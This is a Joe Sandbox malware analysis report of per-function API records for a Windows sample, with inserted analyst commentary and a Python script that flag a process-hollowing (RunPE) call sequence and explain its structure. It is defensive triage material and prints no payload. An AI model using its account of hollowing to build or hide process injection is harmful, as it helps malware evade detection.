                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _strcat
                                                                                                                    • String ID: >>>AUTOIT NO CMDEXECUTE<<<
                                                                                                                    • API String ID: 1765576173-2684727018
                                                                                                                    • Opcode ID: 9cf7010eca5106026e95a37c4c4993c7a48cbbbd0f5b26026c251fe95f3d7589
                                                                                                                    • Instruction ID: e645463cc19bd0c1a49bcabea2d674544a6c2f3c5714d62cb3526a870e150300
                                                                                                                    • Opcode Fuzzy Hash: 9cf7010eca5106026e95a37c4c4993c7a48cbbbd0f5b26026c251fe95f3d7589
                                                                                                                    • Instruction Fuzzy Hash: FBF090B390020D768B00F6E6D942CEFB37C9985704B5006AFA905B3152EA79EA0987B6
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ClearVariant
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1473721057-0
                                                                                                                    • Opcode ID: 30fb1b5656a8e298aebe1b45ed9f9297ed51282c110b4441b4c64d109fdc6671
                                                                                                                    • Instruction ID: 76271617df0236ab3ccd2777984eb13d60b28668e4953fb9a85eec064aa2abc3
                                                                                                                    • Opcode Fuzzy Hash: 30fb1b5656a8e298aebe1b45ed9f9297ed51282c110b4441b4c64d109fdc6671
                                                                                                                    • Instruction Fuzzy Hash: F891A370A00204DFDB14DF65D884AAAB3B5EF09304F24C56BE915AB391D739EC41CBAE
                                                                                                                    APIs
                                                                                                                    • __wsplitpath.LIBCMT ref: 004678F7
                                                                                                                      • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                                    • GetLastError.KERNEL32(00000000,00000000), ref: 004679C7
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorLast__wsplitpath_malloc
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 4163294574-0
                                                                                                                    • Opcode ID: b7e2b2e067b321cb14cd8dd870a284e502ce9d37bff932640fd458450c7e1011
                                                                                                                    • Instruction ID: 5ded281afda408fdcd401bf2365ceabb828b89a129c607e264fb1023d06c7d2e
                                                                                                                    • Opcode Fuzzy Hash: b7e2b2e067b321cb14cd8dd870a284e502ce9d37bff932640fd458450c7e1011
                                                                                                                    • Instruction Fuzzy Hash: FB5126712083018BD710EF75C881A5BB3E5AF84318F044A6EF9559B381EB39ED09CB97
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 0040F6F0: _wcslen.LIBCMT ref: 0040F705
                                                                                                                      • Part of subcall function 0040F6F0: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,?,00454478,?,00000000,?,?), ref: 0040F71E
                                                                                                                      • Part of subcall function 0040F6F0: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,?,00000000,?,?,?,?), ref: 0040F747
                                                                                                                    • _strcat.LIBCMT ref: 0040F786
                                                                                                                      • Part of subcall function 0040F850: _strlen.LIBCMT ref: 0040F858
                                                                                                                      • Part of subcall function 0040F850: _sprintf.LIBCMT ref: 0040F9AE
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ByteCharMultiWide$_sprintf_strcat_strlen_wcslen
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3199840319-0
                                                                                                                    • Opcode ID: 49a3294527d5b305cfbd6c685c74412098d504eb7a2552fd7b1e5b305baf6987
                                                                                                                    • Instruction ID: aac9d08775c2cbfae45fd546c2dd5c585d34072f6b495fb7426f91ad36779b1c
                                                                                                                    • Opcode Fuzzy Hash: 49a3294527d5b305cfbd6c685c74412098d504eb7a2552fd7b1e5b305baf6987
                                                                                                                    • Instruction Fuzzy Hash: 7B2148B260825027D724EF3A9C82A6EF2D4AF85304F14893FF555C22C2F738D554879A
                                                                                                                    APIs
                                                                                                                    • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 0040D779
                                                                                                                    • FreeLibrary.KERNEL32(?), ref: 0040D78E
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: FreeInfoLibraryParametersSystem
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3403648963-0
                                                                                                                    • Opcode ID: 1bcd72a0122d59f5f1ef4a441970033eb21b1c6439336685a4482ae7c853bb59
                                                                                                                    • Instruction ID: 5fcdf068f8d8459ddaa7ea8882eac3df2259875866eaebb33036fc29c92b3e87
                                                                                                                    • Opcode Fuzzy Hash: 1bcd72a0122d59f5f1ef4a441970033eb21b1c6439336685a4482ae7c853bb59
                                                                                                                    • Instruction Fuzzy Hash: BB2184719083019FC300DF5ADC8190ABBE4FB84358F40493FF988A7392D735D9458B9A
                                                                                                                    APIs
                                                                                                                    • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,0040DE74,?,00000001,?,00403423,?), ref: 0040F13A
                                                                                                                    • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,0040DE74,?,00000001,?,00403423,?), ref: 00426326
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CreateFile
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 823142352-0
                                                                                                                    • Opcode ID: 01c8104855b6be3cf9f3f51c38ffad3c9237c0860841684a852cd2675ef3d23e
                                                                                                                    • Instruction ID: 8a88c5525f76e0b0fff62cf48ad84dc7055e673dbb4ccc29545257d8619b8f55
                                                                                                                    • Opcode Fuzzy Hash: 01c8104855b6be3cf9f3f51c38ffad3c9237c0860841684a852cd2675ef3d23e
                                                                                                                    • Instruction Fuzzy Hash: 16011D70784310BAF2305A68DD0BF5266546B45B24F20473ABBE5BE2D1D2F86885870C
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                                                                                                                    • __lock_file.LIBCMT ref: 00414A8D
                                                                                                                      • Part of subcall function 00415471: __lock.LIBCMT ref: 00415496
                                                                                                                    • __fclose_nolock.LIBCMT ref: 00414A98
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2800547568-0
                                                                                                                    • Opcode ID: a5ee4eb6f63f5c531cf15d6f0d52328148e0080a1a420ce895dcb566fcff73ac
                                                                                                                    • Instruction ID: d9443fdd3ee0a3059f5d17ec53abbfe2105cc8a5d10ddad395bff0ae1f283336
                                                                                                                    • Opcode Fuzzy Hash: a5ee4eb6f63f5c531cf15d6f0d52328148e0080a1a420ce895dcb566fcff73ac
                                                                                                                    • Instruction Fuzzy Hash: EEF0F6308417019AD710AB7588027EF37A09F41379F22864FA061961D1C73C85C29B5D
                                                                                                                    APIs
                                                                                                                    • __lock_file.LIBCMT ref: 00415012
                                                                                                                    • __ftell_nolock.LIBCMT ref: 0041501F
                                                                                                                      • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: __ftell_nolock__getptd_noexit__lock_file
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2999321469-0
                                                                                                                    • Opcode ID: 5d7fd30e9bb4e6974f03027405c635b91b5e55acacb14f372dcacdb3af77c648
                                                                                                                    • Instruction ID: e3e7bc223609ce985a1750c66bb322057640979a4505571362f253753ce4bf01
                                                                                                                    • Opcode Fuzzy Hash: 5d7fd30e9bb4e6974f03027405c635b91b5e55acacb14f372dcacdb3af77c648
                                                                                                                    • Instruction Fuzzy Hash: 64F03030900605EADB107FB5DD027EE3B70AF443A8F20825BB0259A0E1DB7C8AC29A59
                                                                                                                    APIs
                                                                                                                    • CreateProcessW.KERNELBASE(?,00000000), ref: 04208A73
                                                                                                                    • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 04208B09
                                                                                                                    • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 04208B2B
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2145500065.0000000004207000.00000040.00000020.00020000.00000000.sdmp, Offset: 04207000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_4207000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2438371351-0
                                                                                                                    • Opcode ID: 935c44ad8318b3af66d252774f477c9026677184fbf87e93bc0843909b837ee7
                                                                                                                    • Instruction ID: 6f89f9e2c6dff9a8aeff840265d2d9a1641a58db3f097566c6175cf096747746
                                                                                                                    • Opcode Fuzzy Hash: 935c44ad8318b3af66d252774f477c9026677184fbf87e93bc0843909b837ee7
                                                                                                                    • Instruction Fuzzy Hash: E712EE20E24658C6EB24DF64D8507DEB272EF68300F1090E9910DEB7A5E77A5F81CF5A
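The record above is the one worth an analyst's attention in this block: CreateProcessW, then Wow64GetThreadContext with a ContextFlags value of 00010007, then a 4-byte ReadProcessMemory, all executed from a region the report marks "based on PE: false" (offset 04207000, a dump outside the mapped image, unlike the 00400000 records around it). 0x00010007 is CONTEXT_FULL for x86 (CONTEXT_i386 | CONTEXT_CONTROL | CONTEXT_INTEGER | CONTEXT_SEGMENTS). That call shape is the front half of process hollowing (RunPE): spawn a child, fetch its thread context, read a 4-byte pointer out of it; in the common implementation the pointer is the child's PEB->ImageBaseAddress located via the Ebx register, although the report does not show the address being read, and the write/SetThreadContext/ResumeThread side of the sequence is not in this record. Below is an added example of how an analyst can scan such API records for this pattern; it is not code from the sample or from Joe Sandbox. The sample text is constructed from the two preceding records with whitespace trimmed, and the set of indicator APIs is the author's choice.

```python
"""Scan Joe Sandbox-style per-function API records for the process-hollowing
call shape (process creation + thread context + remote memory access).
Analyst tooling added as an example; SAMPLE is constructed from the report."""
import re
from dataclasses import dataclass, field
from typing import List, Optional, Tuple

SAMPLE = """\
APIs
• __lock_file.LIBCMT ref: 00415012
• __ftell_nolock.LIBCMT ref: 0041501F
  • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
Memory Dump Source
• Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
APIs
• CreateProcessW.KERNELBASE(?,00000000), ref: 04208A73
• Wow64GetThreadContext.KERNEL32(?,00010007), ref: 04208B09
• ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 04208B2B
Memory Dump Source
• Source File: 00000000.00000002.2145500065.0000000004207000.00000040.00000020.00020000.00000000.sdmp, Offset: 04207000, based on PE: false
"""

# "• Name.Module(args), ref: ADDR" for Win32 calls, "• name.LIBCMT ref: ADDR" for
# CRT entries, optionally prefixed with "Part of subcall function XXXX:".
API_RE = re.compile(
    r"^•\s*(?:Part of subcall function [0-9A-Fa-f]+:\s*)?"
    r"([A-Za-z_][A-Za-z0-9_]*)\.([A-Za-z0-9_]+)"
    r"(?:\(([^)]*)\))?,?\s*ref:\s*([0-9A-Fa-f]+)")
SRC_RE = re.compile(
    r"Source File:\s*(\S+), Offset:\s*([0-9A-Fa-f]+), based on PE:\s*(true|false)")

# x86 CONTEXT_* bits from winnt.h; CONTEXT_i386 | CONTROL | INTEGER | SEGMENTS == 0x10007.
CONTEXT_I386 = 0x00010000
CONTEXT_FLAG_BITS = [(0x01, "CONTROL"), (0x02, "INTEGER"), (0x04, "SEGMENTS"),
                     (0x08, "FLOATING_POINT"), (0x10, "DEBUG_REGISTERS"),
                     (0x20, "EXTENDED_REGISTERS")]

# Indicator sets are an analyst's choice, not an exhaustive list.
PROCESS_CREATE = {"CreateProcessA", "CreateProcessW", "CreateProcessInternalW"}
THREAD_CONTEXT = {"GetThreadContext", "SetThreadContext",
                  "Wow64GetThreadContext", "Wow64SetThreadContext"}
REMOTE_MEMORY = {"ReadProcessMemory", "WriteProcessMemory", "VirtualAllocEx",
                 "NtUnmapViewOfSection", "ZwUnmapViewOfSection", "NtWriteVirtualMemory"}


@dataclass
class ApiCall:
    name: str
    module: str
    args: List[str]
    ref: int


@dataclass
class Record:
    calls: List[ApiCall] = field(default_factory=list)
    source: str = ""
    offset: Optional[int] = None
    based_on_pe: Optional[bool] = None


def parse_records(text: str) -> List[Record]:
    """One Record per 'APIs' block; other report lines are ignored."""
    records: List[Record] = []
    current: Optional[Record] = None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            current = Record()
            records.append(current)
            continue
        if current is None:
            continue
        m = API_RE.match(line)
        if m:
            name, module, args, ref = m.groups()
            arglist = [a for a in (args or "").split(",") if a]
            current.calls.append(ApiCall(name, module, arglist, int(ref, 16)))
            continue
        m = SRC_RE.search(line)
        if m:
            current.source = m.group(1)
            current.offset = int(m.group(2), 16)
            current.based_on_pe = m.group(3) == "true"
    return records


def decode_context_flags(value: int) -> List[str]:
    """Names of the CONTEXT_* bits in an x86 ContextFlags value ([] if not x86)."""
    if value & 0xFFFF0000 != CONTEXT_I386:
        return []
    return [name for bit, name in CONTEXT_FLAG_BITS if value & bit]


def assess(record: Record) -> List[str]:
    """Hollowing indicators present in one record ([] means nothing notable)."""
    names = {c.name for c in record.calls}
    reasons: List[str] = []
    if names & PROCESS_CREATE and names & THREAD_CONTEXT:
        reasons.append("creates a process and accesses a thread context")
    if names & THREAD_CONTEXT and names & REMOTE_MEMORY:
        reasons.append("pairs thread-context access with remote memory access")
    for c in record.calls:
        # The plugin prints literal args as hex and unresolved ones as "?".
        if c.name in THREAD_CONTEXT and len(c.args) >= 2 and c.args[1] != "?":
            flags = decode_context_flags(int(c.args[1], 16))
            if flags:
                reasons.append(f"{c.name} requests CONTEXT_{'|'.join(flags)}")
    if record.based_on_pe is False:
        reasons.append(f"runs from non-image memory at {record.offset:08X}")
    return reasons


def flag_hollowing(text: str) -> List[Tuple[Optional[int], List[str]]]:
    """(offset, reasons) for every record showing at least one indicator."""
    return [(r.offset, assess(r)) for r in parse_records(text) if assess(r)]


if __name__ == "__main__":
    for offset, reasons in flag_hollowing(SAMPLE):
        print(f"{offset:08X}:")
        for why in reasons:
            print("  -", why)
```

Run against the constructed sample, the CRT record at 00400000 produces no indicators and the 04207000 record produces four. The "based on PE: false" test is the cheap one to keep in any triage script: code calling process-creation and thread-context APIs from a private allocation rather than a mapped image is the unpacked stage, and its dump is the one to carve and analyse.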
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _memmove
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 4104443479-0
                                                                                                                    • Opcode ID: 224a1bccd0668171228bffd00b4e167e84225026459a60d9317a1c29c8a59c26
                                                                                                                    • Instruction ID: 6397ebbfaf442e519c955e074037b65107783079284990db5ef0c3dd021860ed
                                                                                                                    • Opcode Fuzzy Hash: 224a1bccd0668171228bffd00b4e167e84225026459a60d9317a1c29c8a59c26
                                                                                                                    • Instruction Fuzzy Hash: 36317371E00209EBDF009F52E9866AEFBF4FF40740F2189BED855E2650E7389990D759
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _memmove
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 4104443479-0
                                                                                                                    • Opcode ID: 8b2818c8434b9a070bb7a9b9dd55d4aa8d61190f7c46d4f62081b3e0e63eee4f
                                                                                                                    • Instruction ID: 412edbf2df7bf8c64f36b821a583ca4e96a0f18e0b9aed18a790d0e499aeb9a1
                                                                                                                    • Opcode Fuzzy Hash: 8b2818c8434b9a070bb7a9b9dd55d4aa8d61190f7c46d4f62081b3e0e63eee4f
                                                                                                                    • Instruction Fuzzy Hash: 60319CB9600A21EFC714DF19C580A62F7E0FF08310B14C57ADA89CB795E774E892CB99
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ProtectVirtual
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 544645111-0
                                                                                                                    • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                                    • Instruction ID: 21b87f0337b3904faf2e49e7d89a80b8c5538d611ad57d97d778efbd48141229
                                                                                                                    • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                                    • Instruction Fuzzy Hash: 8131F770A00105DBC718DF88E590AAAF7B1FB49310B6486A6E409CF355DB78EDC1CBD9
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: e5559574dc10eca8e97d8025a500eef8ee7d185e3c773571fee143e03780f234
                                                                                                                    • Instruction ID: 427b4a632c312742ac0951887501238d3178a51c37fde1d0fd35c98815df3d2a
                                                                                                                    • Opcode Fuzzy Hash: e5559574dc10eca8e97d8025a500eef8ee7d185e3c773571fee143e03780f234
